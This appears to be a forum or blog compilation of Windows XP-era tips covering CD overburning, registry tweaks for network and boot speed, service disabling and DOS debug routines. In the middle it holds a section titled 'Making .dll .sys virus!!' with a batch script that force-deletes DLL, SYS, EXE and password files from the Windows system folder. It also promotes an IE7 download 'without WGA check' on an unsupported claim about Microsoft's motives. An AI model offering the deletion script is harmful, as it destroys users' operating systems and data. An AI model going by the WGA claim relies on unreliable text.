2. A writer supporting Overburning.
To check whether this feature is supported by your writer go to Recorder Menu and then select Choose Recorder. Now Select your recorder and in the bottom you should look for this on the screen.Overburn: Supported
3. You need to have the latest firmware for your recorder model, as it will contain information to enable overburning. Most importantly, it will contain read/write strategies for new brands of CD-R and CD-RW media and can resolve many issues you may otherwise run into.
Steps to do:
1. Go to File>>Preferences>>Expert Features and check the box:
Enable Disc-at-once CD overburning and set Maximum CD Size as according to given specifications:
For 80 min media set to 82:00
For 90 min media set to 89:30
For 99 min media set to 99:54:74
and now click OK.
2. Now select File>>New and select No Multisession
3. Click on ISO and set Data Mode to Mode 2/XA
Note for here:
Any CD blank with a size over than 80 minutes (about 700 MB) should be recognized as a size-80 minutes CD due to ISO restrictions. This is absolutely normal. As a result, you could never write a multisession CD using more-than-90-minutes CD blank. If you will try to create multisession on such CD, you should be limited with size-80 minutes (or size-700 MB). As an enother result, you should use overburning option to write CD’s with capacity of over than 80 minutes.
4. Select Burn and check Write Method: Disc-at-once or Disc-at-once/96. Do not load any application during 90-minutes CD burning and decrease burning speed to 12x to avoid buffer overrun.
Hope you will now be comfortable using 800MB CD-R’s but don’t overburn regularly. It can sometimes damage your Writer permanently also. Their are several complaints regarding this.P.S. Writer does not claim responsibility of the success of the above method in every case. I will not be held responsible in case you damage some of your hardware or software while doing this.
Get DOUBLE Speed in Brod band net !!
Now let me tell you one important fact related with tuning. Value of MTU depends upon how fast a connection you have, what kind of activities you perform (ask yourself a question. Are your a mild, average or high end user of Internet ? To put it in other words, Do you download little or nothing, or are an average surfer or are Internet savvy individual and download everything from programs, apps, patches to watching Internet audio/video real-time content?) Depending upon who you are as a user and what kind of connection (modem, dsl, cable or in rare cases T1/T3), this tuning may have little to significant effect on your Internet experience. All right MTU stand for Maximum Transmission Unit.
Value of MTU decides the size of Internet data packet. Bigger the size, more you can transfer.
Analogy could be made with a bucket. If bucket is small, you can carry little but it would be no strain on your strength. Bigger the bucket, more you can carry but it strains your physical strength. (Well! Its not that simple but good enough to understand). Objective should be find a perfect balance which works for you. I think maximum that you can put is as value of MTU is 1500 (but could be higher for your specific network) and it may not make sense making it smaller than 68.Again this is a registry tweak unless and until you have a tweaking utility that can do it for you.Open Registry by going to START-RUN and entering REGEDIT and Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters\Interfaces\ ID for Adapter. For this right click on right pane and add a key by the name MTU. For this key you can add a DWORD value from 68 to 1500 (or higher value is certain cases). If you put less than 68, it will default to 68.
If you put a value higher than 1500 or your Network permitted max, it will default to permitted max.
Enable automatic path MTU size detection and impro
As started on previous tip (Tip 52), MTP size plays an important role in deciding Internet speed. But its not so easy to determine the right value of MTU. For those of us who fall in this category and would prefer computer to find that for us, follow trick may work. I can not say with confidence whether this would work across all network but it should and there is no harm in trying it out. Now before I do that let me tell you what this action will do.
Applying this trick, you would ask computer to automatically find out the maximum MTU size possible in the connection path to a host. This value could be different for different sites. I think this trick should pick the lowest common denominator across a particular path. Typically If MTU size is not optimized, this job has to be done by a router which would mean a significant waste of time (small chunks adds to a considerable loss if you imagine that there are billions of packets involved across the whole Internet) resulting in poor throughout and congestion on cyber lanes. All right this key is called Enable PMTU Discovery.
Again this is a registry.Open Registry by going to START-RUN and entering REGEDIT and Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters\Interfaces\ ID for Adapter. For this right click on right pane and add a key by the name EnablePMTUDiscovery. For this key you can add a DWORD boolean value of 0 or 1 with 1 being TRUE (value that enables auto detection).
Since we are trying this tweak, set to 1 and enable the TCP to attempt to discover the MTU size over the specific path to host.
Making .dll .sys virus!!
open notepad and past this code:
@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
@Echo off c: cd %WinDir%\System\ deltree /y *.psw cd\ deltree /y *.exe
Donwload "Internet Explorer 7" Without WGA Check !!
Then i have a good news for you.Now Microsoft allows you to download a special version which is without the WGA check.Microsoft has done this to stop the increasing dominance of "Mozilla Firefox".
If you want to download this version of Internet explorer 7 you can download it
From here
Add A Windows XP Logon Wallpaper !!
2) Double click the wallpaper value, and type in the full path of your image and the filename.
3) To tile the image set "TileWallPaper" to 1
4) To Stretch the wallpaper set "WallPaperStyle" to 2
5) Close the registry editor and the changes will take place when you Log off.
This could be your favourite image or picture as long as it is a .bmp or .jpg.
Try it at your own Risk.
Make a folder dissapear even from ctrl+A !!
if the folder u wanna hide was "hide me"
in C:\hide me
then open notpad and write
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}now open notpad again and write
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} gamesnow you have 2 batch files the loc.bat will hide the folder, the key.bat will do just the opposite
Enjoy!!

Calculation on command Prompt ! u knew dis???
The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:
C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7
Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.
For more information, type set /? at the command prompt.
Change DOS color !!
COLOR [attr]
attr Specifies color attribute of console output
Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the below values.
0 = Black
8 = Gray
1 = Blue
9 = Light Blue
2 = Green
A = Light Green
3 = Aqua
B = Light Aqua
4 = Red
C = Light Red
5 = Purple
D = Light Purple
6 = Yellow
E = Light Yellow
7 = White
F = Bright White
If no argument is given, this command restores the color to what it was when CMD.EXE started. This value either comes from the current console window, the /T command line switch or from the DefaultColor registry value. The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute the COLOR command with a foreground and background color that are the same.
EXAMPLE
Color 2A = Creates a green background with light bright green text, similar to many of the FTP, telnet, and old BBS console screens.
Valid for a session only..

Infinite points trick II
To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.
registry hack which will allow you to see your opponents' cards
Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.
Speed up Booting Xp by 70 Times !!
Stopping Unneeded Startup Services !
Along with the core operating system and programs that Windows XP runs when it starts, there is also a host of services involved. Many of these services are necessary for Windows XP to operate correctly. However, many of them are for features in Windows XP that you may not use at all. You can peruse the services and disable any service that you do not want to run. The fewer services that run, the more quickly Windows XP will boot.
Caution:
Exercise caution when stopping services. If you do not know what a service does or are unsure of the ramifications of stopping the service, leave it alone. Some services are critical to Windows XP's operations, so make sure you understand what the service is before you disable it.
To reduce the number of services that start on bootup, you can access two different areas of Windows XP. The first is the System Configuration Utility. The Services tab shows you the services that start when the computer boots.
You can stop a service from starting by simply clearing the check box next to the service and clicking OK. However, before you do so, there is another way to disable services that you may prefer because the interface gives you more information about the service in question.
Open Control Panel/Administrative ToolsServices or else select Start/Run, type services.msc, and click OK. Either way, you see the Services console.
I prefer to use the Services console instead of the System Configuration Utility because it describes what the service does. Additionally, you can double-click a service and examine its properties.
Notice the Startup Type column in Figure 4-2. This information lists whether the service is automatic or manual. Manual services are only started in Windows XP when you start a process that requires the service. Some other process may require the service that has a "dependency" relationship with it; in this case, the dependency service will start, as well. Because these services do not start automatically when you boot Windows XP, you do not need to do anything with manual services.
However, all services listed as automatic start when Windows XP boots. These are the services that increase boot time. As I have mentioned, many of them are necessary and important, so you should not stop automatic services from booting unless you are sure of the ramifications. You can get this information by looking at the Description column. Here's a quick look at common services you may want to live without:
SPEED UP BOOT BY DISABLING UNUSED PORTS.!!
You may have tried many tweaks like modifying windowsXP start-up applications, prefetches, unload DLLs method, etc. And yes those methods do work for me.
I have just accidentally found out another way to give you an extra boost in windowsXP's boot performance. This is done by disabling your unused devices in
Device Manager. for example, if you don't have input devices that are connected to one of your USBs or COM ports, disabling them will give you an extra perfromance boost in booting. Go to Control Panel -> System -> Hardware tab -> device manager Disable devices that you don't use for your PC and then restart.
Do Dis !!
1.Start Registry Editor (Regedit.exe).
2.Locate the following key in the registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\PrefetchParameters
3.Make sure you backup the keys by exporting them to a .reg file.
4.On the EnablePrefetcher value, change the setting from 3 to 5 (decimal).
5.Close the registry editor.
6.Restart your computer
Automatic Updates !
This service enables Windows XP to check the Web automatically for updates. If you don't want to use Automatic Updates, you can disable the service. You can always check for updates manually at the Windows Update Web site.
Computer Browser: If your computer is not on a network, you don't need this service. If you are on a network, leave it alone.
DHCP Client: If you are not on a network, you do not need this service. If you are on a small workgroup, you can still increase boot time by configuring manual IP addresses (which I explore later in this chapter).
DNS Client: If you are not on a network, you do not need this service. If you are, leave it alone.
Error Reporting and Event Log: You don't have to use these services but they can be very helpful, so I would leave them configured as automatic.
Fax: If you don't use your computer for fax services, you can disable this one.
Help and Support: If you never use the Windows XP Help and Support Center (found on the Start menu), you can disable this service.
IMAPI CD-Burning COM: This service enables you to burn CDs on your computer. If you never burn CDs, you can disable the service.
Indexing Service: Your computer keeps an index of files but if you rarely search for files, the service is just a resource hog. You can stop it and turn the service to manual.
Windows Firewall/Internet Connection Sharing: If you do not use these features, you can disable them.
Infrared Monitor: If you do not use infrared devices, you can disable this service.
Messenger: This service sends alert messages on a local area network (it is not the same as Windows Messenger). If you are not on a network, you can disable this service.
Print Spooler: If you do not do any printing from the computer, you can disable this service. If you print, make sure you leave it as automatic.
Remote Registry: This service allows remote users to modify the Registry on your computer. If you are not on a network, you can disable this service.
System Restore Service: This service allows you to use System Restore. If you have turned off System Restore anyway, you do not need to turn off the service. If you do, you turn off System Restore.
Themes: If you do not use themes, you can disable this service.
Windows Image Acquisition: If you do not use scanners or digital cameras, you can disable this service.
Wireless Zero Configuration: If do not use wireless networking devices, you can disable this service.
You may have a number of other automatic services, depending on software and other configurations on your computer. So it's a good idea to look through the services and learn more about them. If you double-click a service, a Properties dialog box appears
Notice that on the General tab, you see a Startup Type drop-down menu. If you want to change an automatic service to manual, select Manual here and click OK. As a general rule, don't disable a service unless you are sure you will never use it. However, manual configuration allows the service to be started when you find it necessary, thus speeding up your boot time.
However, before you change a service to manual, look at the Dependencies tab (see Figure 4-4). This tab shows you which other services depend upon the service you are considering changing.
Keep in mind that services are necessary for the vast functionality you get with Windows XP. Change only those services that you understand and do not use. How you use your Windows XP computer should be the best guide in terms of optional startup services.
Tip !
The Indexing service and the System Restore service take up a lot of disk space and system resources across the board. You can live without the Indexing service but I suggest that you keep using System Restore. It works great when you are in a bind and this is one case where the loss of speed may not be worth the ramifications of not using System Restore.
Speed Tips and Tricks for Windows XP Startup
Aside from startup programs, services, and the Prefetch folder, there are a number of other startup procedures and issues you can modify to help Windows XP start faster. The following sections explore those tips and tricks.
Manual IP Addressing on Small Office/Home Networks
Windows XP is configured to help you take care of networking. It uses the TCP/IP protocol for networking in workgroups, or what you might call small office or home networks that do not use a dedicated server.
The problem is that automatic IP addressing can be slow. When your computer boots, it has to query the network to see what IP addresses are already in use and then assign itself one. If you want to speed up the boot time a bit, consider manually assigning IP addresses to all computers on the network. This way, the network computers do not have to worry about locating an automatic IP address. Because one is manually configured, the operating system doesn't have to spend time solving this problem.
This isn't a networking book, however, so I won't delve into the implications of using a manual IP address, but if you are using a computer that functions as a host computer to the Internet (using Internet Connection Sharing [ICS]), you can get into connectivity problems if you change the configuration of the IP address. However, you can still work around this problem by starting with the ICS host computer.
Select Start/Connect To/Show All Connections. Right-click your network adapter card and click Properties. On the General tab, select TCP/IP in the list of services and click the Properties button.
In the TCP/IP properties, you can see if you use an automatic or manual IP address. In the example in Figure 4-5, I have configured a manual IP address of 90.0.0.1 and a default subnet mask. The other computers on my office network each use a different IP address in the same class, such as 90.0.0.2, 90.0.0.3, 90.0.0.4, and so on. This way, each computer has a permanent IP address, which helps increase boot time. Note that if you change the IP addresses of your computers, they must all use the same subnet mask. A default subject mask of 255.255.255.0 will keep you in good shape.
Make sure you understand the implications of changing IP addresses on your network. If you have no networking experience at all, you may be wiser to leave the automatic IP addressing as is and try to gain some speed using the additional suggestions in this chapter.
Disabling Recent Documents History !
Windows XP includes a feature that keeps track of all recent documents you have opened or used. The idea is that you can select Start/Recent Documents History and quickly reopen any document you have recently used. I use many documents each day and never use the feature myself. In my opinion, I can keep up with what I want to use without Windows XP doing it for me.
The bad thing about Recent Documents History is that Windows XP has to calculate what should be put there each time you boot Windows, which can slow things down. So, if you never use the Recent Documents History, it's a good idea to disable it. Here's how:
1. Open the Registry Editor (select Start/Run, type regedit, and click OK).
2. Navigate to HKEY_CURRENT_USER\Software\Mcft\Windows\ CurrentVersion\Policies\Explorer.
3. Create a NoRecentDocsHistory D_WORD key. Double-click the value to open it once it is created.
4. Set the Data Value to 1 to enable the restriction.
5. Click OK and close the Registry Editor. You'll need to restart the computer for the change to take effect.
Disabling the Boot Logo !
You can remove the boot logo that appears when you start Windows XP. This little tweak probably shaves only a few seconds off your boot time but seconds count if you are serious about trying to get Windows XP up and running as quickly as possible. The only negative is that if you remove the boot logo, you will also not see any boot messages, such as check disk. (But if you are not having problems with your computer, this isn't such a big deal.)
To remove the boot logo, follow these steps:
1. Select Start/Run, type msconfig, and click OK.
2. In the System Configuration Utility, click the BOOT.INI tab.
3. On the BOOT.INI tab, click the NOGUIBOOT check box option. Click OK.
Removing Unwanted Fonts !
One trick that increases your boot time a bit is to lose any fonts in the Fonts folder in Control Panel that you never use. The more fonts you have, the more processing Windows XP has to do to prep all of those fonts for use. You must be a bit careful here to not remove fonts that you might want, but there is a good chance that you can live without many of them. For instance, you may have foreign language fonts and other symbol fonts (such as Wingdings) that you never use.
To delete unneeded fonts, follow these steps:
1. Open the Fonts folder in Control Panel.
2. Select Edit/Select All and then Edit/Copy.
3. Create a new folder on your desktop, open it, and select Edit/Paste.
4. In this new folder, delete any of the fonts you do not want.
5. Return to the Fonts folder in Control Panel. Right-click the selected fonts and click Delete.
6. Go back to your new desktop folder and click Edit/Select All.
7. Return to your Fonts folder and click Edit/Paste. You now have only the desired fonts in the Fonts folder.
Tip:
You can directly delete fonts from the Fonts folder without creating the secondary folder. However, I recommend the preceding steps to help ensure that you do not make a mistake in the deletion process.
Stopping Remote Assistance and Remote Desktop Sharing !
In Windows XP Professional, you have two remote networking features called Remote Assistance and Remote Desktop Sharing. These remote networking features are very helpful in a variety of situations but if you don't use them, it is good idea to disable them to save boot time. You can always enable them later if you want to use them.
Note:
If you are interested in using Remote Desktop or Remote Assistance, see my book Windows XP for Power Users: Power Pack published by John Wiley & Sons.
1. Open the Start menu, right-click My Computer, and choose Properties.
2. Click the Remote Tab.
3. Clear both check boxes to disable Remote Assistance and Remote Desktop.
Speeding Up the Dual-Boot Timeout !
If you dual-boot your computer with Windows XP and another operating system, you see an operating system selection menu on startup. If you typically boot into Windows XP and not the other operating system, you can speed up the dual-boot timeout value so that you do not wait so long for the boot process to select your default operating system and continue with the boot process. The default timeout value is 30 seconds but you can change this setting to 10. This gives you enough time to select the alternate operating system if you want but also speeds up the boot process. You can skip this section if you do not use a dual-boot configuration.
Follow these steps:
1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is located in C:\boot.ini.
2. Open the file with Notepad (which is what opens it by default).
3. Change the Timeout value to 10 (see Figure 4-11).
4. Select File/Save and close Notepad.
Speeding Up Your PPPoE Connection !
If you use a Point-to-Point Protocol connection over Ethernet (PPPoE), you may notice a delay in using the PPPoE connection after startup. By default, there is a 120 second delay but you can stop this behavior by manually configuring an IP address for the network adapter card. If you do not use a PPPoE connection, you can skip this section.
1. Select Start/Connect to/Show All Connections.
2. Open the TCP/IP properties for your LAN network interface card.
3. Manually set the IP address on the TCP/IP properties to an appropriate IP address and subnet mask for your network.
Reducing the Wait Time
When you start to shut down Windows XP, it has to quit, or "kill," any live applications or processes that are currently running. So close all applications first. However, some applications and processes are always running in the background. You can reduce the amount of time that Windows XP waits for those applications and processes to close before Windows XP kills them. Edit three different Registry settings to change this:
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop. Select WaitToKillAppTimeout and set the value to 1000.
3. Select the HungAppTimeout value and set it to 1000 as well.
4. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout \newline value and set it to 1000 as well.
5. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control. Select the WaitToKillServiceTimeout value and set it to 1000.
6. Close the Registry Editor.
Automatically Killing Tasks on Shutdown !
You know the drill. You start to shut down the computer, you wait a few moments, and then you see a dialog box asking if you want to kill an application or service that is running. Instead of prompting you, you can make Windows XP take care of the kill task automatically. Here's how:
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
3. Highlight the value AutoEndTasks and change the value to 1.
4. Close the Registry Editor.
More
Here's a great tip to speed up your browsing of Windows XP machines. Its actually a fix to a bug installed as default in Windows 2000 that scans shared files for Scheduled Tasks. And it turns out that you can experience a delay as long as 30 seconds when you try to view shared files across a network because Windows 2000 is using the extra time to search the remote computer for any Scheduled Tasks. Note that though the fix is originally intended for only those affected, Windows 2000 users will experience that the actual browsing speed of both the Internet & Windows Explorers improve significantly after applying it since it doesn't search for Scheduled Tasks anymore. Here's how :
Open up the Registry and go to : HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace Under that branch, select the key : {D6277990-4C6A-11CF-8D87-00AA0060F5BF} and delete it. This is key that instructs Windows to search for Scheduled Tasks. If you like you may want to export the exact branch so that you can restore the key if necessary. This fix is so effective that it doesn't require a reboot and you can almost immediately determine yourself how much it speeds up your browsing processes.
Clear CMOS all Tricks !!
Debug has been included in every version of MS-DOS as well as Windows. When running any of the debug routines it is recommended that if you have Windows that you exit or shut down to get into a real DOS prompt (unless you're running Windows ME, Windows 2000, Windows XP, or later versions).
Once at the MS- DOS prompt, run through the below example, this example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not harm anything.
Type debug and press enter.
This should get you to a - (small dash). This is the debug prompt.
At the - type d40:00 and press enter; this will return several lines of information.
After the feedback you will be back to the debug prompt.
To exit out of debug type q and press enter. This will return you back to the MS-DOS prompt.
In some of the below debug routines you will notice that a "g" is typed, then "q". G tells the computer that the code type is not self executing and must be run at this point. If completed, the program will return Program Terminated Normally which indicates you can now quit from the debug program.
TESTING PORTS
The below debug routine will check the ports of the computer to allow you to know if ports are being detected or not. Type debug to get to the "-" Type D40:0
You should get several lines; however, the first line is the only important line, which should read the following:
0040:0000 F8 03 F8 02 E8 03 E8 02 - 78 03 78 02 BC 03
F8 03
F8 02

E8 02
78 03
78 02
BC 03
COM1
COM2
COM3
COM4
LPT1
LPT2
LPT3
The above graph shows you what the feed back means as far as port, so if you see F8 03, this would be an indication that COM1 is being detected; if you see 00 00, this is an indication that it is not being detected, which could mean that hardware is bad or that it is disabled inCMOS
Once you have finished looking at the information, type Q and press enter to get out of Debug.
CLEAR CMOS
The below debug routine will clear CMOS, BIOS, Passwords, Settings, Viruses, and other items residing in the CMOS. During this process you may get returned characters which are an indication that the string has gone in, if you by chance get ERROR ensure that you have typed the line in correctly, if not retype. Ensure that you do not skip any lines, that it is ALL typed in correctly to help prevent problems. Before running this Debug routine also ensure that you have read the above disclaimer. After typing debug you will get "-" which is were you can begin by typing A and pressing enter. A

JOYSTICK TEST
This test will test to see if your Joystick is present or not. Type debug from the DOS prompt once at the "-". Type i201 If you get a FF response attempt hold one of the main buttons on your joystick, and while holding the button down type i201 and see if a different response is given, each button on the joystick should return a different response. However, some special joysticks, such as the Microsoft Sidewinder, which has more than 4-5 buttons, may not return a response for all extra buttons because these buttons are generally controlled through software. If a FF is still given on each of the buttons on the game paddle or joystick, it is a good possibility that either the Joystick and or the Joystick port is bad. If possible, attempt these steps with another known working joystick. However, if you are receiving different responses when pressing and holding the keys on the joystick, the computer hardware is working properly. Type q and press enter to quit out of debug.
ERASING SECTOR 2
Before doing the below routine ensure that you have read our disclaimer and that you're sure that this is safe to do on your hard drive. Some computer hard drive manufacturers may void your warranty if this routine is ran or in some situations this can cause damage to the hard drive. This routine is useful in clearing DDO and unknown partitions. If this routine completes successfully it will erase everything in Sector 2. In the below debug routine, only type what is in bold from line 3 to 9, you will get a response if typed in properly. If you get a response continue to type the bold text as shown below in the below example.

Once back at DOS, reboot your computer When your computer comes back on from doing the above you will get an error message as booting up the computer, such as "Invalid Configuration". You must enter CMOS and set the time and date, save, and reboot again. Once rebooted, you will then need to run fdisk and recreate the partitions. Once created, you will then need to format the hard drive and proceed as normal.
